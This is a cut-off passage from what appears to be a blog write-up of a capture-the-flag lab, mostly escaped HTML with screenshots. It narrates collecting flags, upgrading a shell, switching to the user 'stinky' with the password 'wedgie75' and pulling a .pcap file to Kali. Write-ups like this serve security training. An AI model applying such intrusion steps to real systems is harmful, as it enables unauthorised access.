/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The &lt;b&gt;FLAG_2&lt;/b&gt; is available:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjoI_R-DFh1ASakKMjLobvffMqZlHh47TT-vgfiOLlAIk1BkqmCwVa8EyUT3K4FfE_XNW_Uq4Iav7qiB_qfcIOq5FqzPMx2plkq221VNFqQ9DsCCfJ-gS4mpZi0GL_hgSAElEpAgrc2airdhsbOv3cxmT5jfF0jkl5ork0gyxUF73OcUaUNOTShMfYGnw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;526&quot; data-original-width=&quot;884&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjoI_R-DFh1ASakKMjLobvffMqZlHh47TT-vgfiOLlAIk1BkqmCwVa8EyUT3K4FfE_XNW_Uq4Iav7qiB_qfcIOq5FqzPMx2plkq221VNFqQ9DsCCfJ-gS4mpZi0GL_hgSAElEpAgrc2airdhsbOv3cxmT5jfF0jkl5ork0gyxUF73OcUaUNOTShMfYGnw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Access to SSH for user &lt;b&gt;unclestinky&lt;/b&gt; is denied:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFfZvMu5SAw0InRHGfFYMvWlHBDJVHo5wmB9E-VfcsEtMbEENYfO7SpvGjhre--DWhGxpLEl-pyiXdNGzwKVqhfMy5TFqMg6OEXlAcqZTeSbIQ-07XeITm-Wq9JK-f0y80bYI2rSpkrEOEEARKaEWDnbq5iHbz7KVpXT916WYZbylnWoajAxSIum5wLw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;691&quot; data-original-width=&quot;863&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFfZvMu5SAw0InRHGfFYMvWlHBDJVHo5wmB9E-VfcsEtMbEENYfO7SpvGjhre--DWhGxpLEl-pyiXdNGzwKVqhfMy5TFqMg6OEXlAcqZTeSbIQ-07XeITm-Wq9JK-f0y80bYI2rSpkrEOEEARKaEWDnbq5iHbz7KVpXT916WYZbylnWoajAxSIum5wLw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- By the way, at this moment of the process let&#39;s improve the shell :&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhIRAYHeT0pvQNx2Sn_lolNLACEdm1lZYC0y3_v5N5iCMaOzbK30DtkNodQLYqADf-urwQe-e2kv-jiU-vrg4KHc7Vfwx7YxzuwT_12_0cO9YyTvSn7FCfNrjqSsxF35NEMecV0JOAToreMfRpaYjJ-qunfQf_aOjsXvtMGu0G16VgjBt1dqzfntPd94Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;52&quot; data-original-width=&quot;541&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhIRAYHeT0pvQNx2Sn_lolNLACEdm1lZYC0y3_v5N5iCMaOzbK30DtkNodQLYqADf-urwQe-e2kv-jiU-vrg4KHc7Vfwx7YxzuwT_12_0cO9YyTvSn7FCfNrjqSsxF35NEMecV0JOAToreMfRpaYjJ-qunfQf_aOjsXvtMGu0G16VgjBt1dqzfntPd94Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Switching to user&lt;b&gt; stinky&lt;/b&gt; with password &lt;b&gt;wedgie75&lt;/b&gt; is allowed:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi_6gMv6CCksxFd4tb9g9E8R6hCg7TBXnw12R5ANC8droh6MPQX6iJ5VPD_eYgP8txRA-XZQz8BRmjDPtA06HqMF5YoigCvlk4GQCL26QUXtL-RjOmj1I7OHAxfCf9J6yRSuaBaMOP5bK6F7m8EIpkTkyM7CCUrpivVMFjOialUA8KINrdiEhBOBzkALg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;162&quot; data-original-width=&quot;616&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi_6gMv6CCksxFd4tb9g9E8R6hCg7TBXnw12R5ANC8droh6MPQX6iJ5VPD_eYgP8txRA-XZQz8BRmjDPtA06HqMF5YoigCvlk4GQCL26QUXtL-RjOmj1I7OHAxfCf9J6yRSuaBaMOP5bK6F7m8EIpkTkyM7CCUrpivVMFjOialUA8KINrdiEhBOBzkALg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking home folder for user &lt;b&gt;stinky&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiVnM5F8W1BSmqCrcfb5O27lmrL7I5AB6D2cnvLGoR4apwo2OBrdI8S-E9Caas764yTraZb6a5TII7ulySPdQBRlQ5T9pyDH33VcrCj5YDyjX-5UIdMPX84tockDd5e-Z0gBpc8igyc7J11HgaE0RNFJj6nJbmGAwcOstqODeS8fm41MlEYjOvsWqz1WA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;261&quot; data-original-width=&quot;721&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiVnM5F8W1BSmqCrcfb5O27lmrL7I5AB6D2cnvLGoR4apwo2OBrdI8S-E9Caas764yTraZb6a5TII7ulySPdQBRlQ5T9pyDH33VcrCj5YDyjX-5UIdMPX84tockDd5e-Z0gBpc8igyc7J11HgaE0RNFJj6nJbmGAwcOstqODeS8fm41MlEYjOvsWqz1WA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There is a public key available:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBXQsO6MBaDGg62hkN66Ro_L0-iqDK-X0gI_bwlEDSZoGRSXyg8PwM3d8p5FZ01jbs3OeiwGW79CxGgzHZTuebS-E57TI2P2MlLmcFHVGtsObJFWiHvTOpk63CJqDnX2Y_MMqPdgzNSOiNV7st9gi4MfYQpC0r77JIo8HPikBoPmAtFB22owYb9l3F7g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;670&quot; data-original-width=&quot;726&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBXQsO6MBaDGg62hkN66Ro_L0-iqDK-X0gI_bwlEDSZoGRSXyg8PwM3d8p5FZ01jbs3OeiwGW79CxGgzHZTuebS-E57TI2P2MlLmcFHVGtsObJFWiHvTOpk63CJqDnX2Y_MMqPdgzNSOiNV7st9gi4MfYQpC0r77JIo8HPikBoPmAtFB22owYb9l3F7g=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Inside &lt;b&gt;Desktop&lt;/b&gt; we can read &lt;b&gt;FLAG_3&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhIcC48FwYqcZy8XuHZgiKL0li3h8gHF_ZlZ9L8VseGzg6iJph5qM7tDQqCwlqnetmutezpT9R1LRomXhihtjjSvjQSzqOgzN7zUJI7JDDYT-88D2WpoAkKBh6JMms0hqph-2Pq0rKYbJQqy9feoH0Ab5F6dqx96LD34lON9yAFJc3PtORxOUrpxWyq8Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;254&quot; data-original-width=&quot;792&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhIcC48FwYqcZy8XuHZgiKL0li3h8gHF_ZlZ9L8VseGzg6iJph5qM7tDQqCwlqnetmutezpT9R1LRomXhihtjjSvjQSzqOgzN7zUJI7JDDYT-88D2WpoAkKBh6JMms0hqph-2Pq0rKYbJQqy9feoH0Ab5F6dqx96LD34lON9yAFJc3PtORxOUrpxWyq8Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Inside &lt;b&gt;Documents&lt;/b&gt; there is a &lt;b&gt;.pcap&lt;/b&gt; file:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjBvbzF4Q0UFpuJn-3WXzUh1PE5QXZQuh7vUVO1XMYJqvvZgnzIYP9U46Y3XOltvvmN8j-jt5qKc29lGJZRYqmcZNwK1D5XNewAZbGXUSJf6Uurks3acJ30Q-hN8PU1RsAa3PGEUmS_HFrCAeCeeiyvhfUc1wFAAdMjUNGXeNQtnknALMA1zT-u46My_g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;184&quot; data-original-width=&quot;743&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjBvbzF4Q0UFpuJn-3WXzUh1PE5QXZQuh7vUVO1XMYJqvvZgnzIYP9U46Y3XOltvvmN8j-jt5qKc29lGJZRYqmcZNwK1D5XNewAZbGXUSJf6Uurks3acJ30Q-hN8PU1RsAa3PGEUmS_HFrCAeCeeiyvhfUc1wFAAdMjUNGXeNQtnknALMA1zT-u46My_g=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- Transferring the &lt;b&gt;.pcap&lt;/b&gt; file to Kali:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikBaYMXh2uiKCVCTfe01ZyDugAvETLBe_DOnMJQHtzysOtg8y_Pyg0k_k688eRG9kM426qnlHRl0CTKRLOrlcE27cTHe2ducYZPPl9RHVSjbnOXq5W-X1VGouunZNU28UDQs40SYepmbcH_68SPfqkMPa29q4QVY7RZyPcv00awbuna1gsWbECShG4Yw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;76&quot; data-original-width=&quot;648&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikBaYMXh2uiKCVCTfe01ZyDugAvETLBe_DOnMJQHtzysOtg8y_Pyg0k_k688eRG9kM426qnlHRl0CTKRLOrlcE27cTHe2ducYZPPl9RHVSjbnOXq5W-X1VGouunZNU28UDQs40SYepmbcH_68SPfqkMPa29q4QVY7RZyPcv00awbuna1gsWbECShG4Yw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi8MVDBBxmD5hQVmb7Shl2yMuLd67uAxB77n30cRn6taBnU1YQ_ETFv8BecYafPLsTbcrt7MTgzKfxa5eX8rbeYzJjCIrbcdGlKrTdch6MJB5sLfujHYlF2rClK7kI_dh4KNCZ9SQMHL05TFklMfTkbzo-zAKS2dqCj0GYDOCKZ6-3XOqNhAtRe-bhRTQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;348&quot; data-original-width=&quot;851&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi8MVDBBxmD5hQVmb7Shl2yMuLd67uAxB77n30cRn6taBnU1YQ_ETFv8BecYafPLsTbcrt7MTgzKfxa5eX8rbeYzJjCIrbcdGlKrTdch6MJB5sLfujHYlF2rClK7kI_dh4KNCZ9SQMHL05TFklMfTkbzo-zAKS2dqCj0GYDOCKZ6-3XOqNhAtRe-bhRTQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: 